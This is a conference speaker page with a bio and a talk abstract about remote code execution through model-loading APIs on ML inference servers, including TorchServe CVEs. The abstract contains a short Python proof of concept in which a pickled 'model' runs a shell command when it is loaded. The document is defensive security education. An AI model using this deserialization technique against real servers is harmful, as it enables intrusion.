Hackfest 2024 - 16-bit Edition


Pratik Amin

My name is Pratik Amin and I have been working in Application Security for about 15 years now. I am a Principal Security Consultant at Kroll (previously Security Compass). I've spent a lot of that time doing AppSec pentests and digging into interesting technology.


What country are you from?

Canada

Your Twitter or other social media account

https://twitter.com/pratikamin


Talk

Oct. 12
14:30
50 minutes
Inference Servers: new technology, same old security flaws.
Pratik Amin

AI- and LLM-based applications are taking the industry by storm. While a lot of time is spent evaluating prompt injection, there is an entire ecosystem of applications that allow models to be run and used. These applications have their own security considerations that you should be aware of.

Inference Servers are used to host machine learning models and expose APIs that allow other components to perform inference on those models. These servers often expose additional APIs that allow users to load new models into them, which can be abused to perform remote code execution. While this technology is new, the baseline security configurations for many of these products are a relic from the past.
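The model-loading risk described above can be illustrated with Python's pickle format, which PyTorch's default `torch.save` serialization uses under the hood: deserializing an untrusted model file executes attacker-chosen code. A minimal, benign sketch (an illustration, not material from the talk):

```python
import pickle
import subprocess

# A pickled "model" controls what runs at load time: __reduce__ tells
# the unpickler which callable to invoke during deserialization.
class MaliciousModel:
    def __reduce__(self):
        # Benign stand-in for an attacker's command
        return (subprocess.check_output, (["echo", "pwned"],))

payload = pickle.dumps(MaliciousModel())

# Simulate an inference server loading an uploaded model file:
result = pickle.loads(payload)
print(result)  # the command ran during unpickling
```

This is why an unauthenticated model-upload or model-registration API is effectively a remote-code-execution endpoint.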

In this talk I will explain what an inference server is, how these servers work, and how you can achieve remote code execution on them. The talk focuses on the practical security risks in this ecosystem. I will also share details of a couple of CVEs related to TorchServe.

AI Security
Track 2 (206a)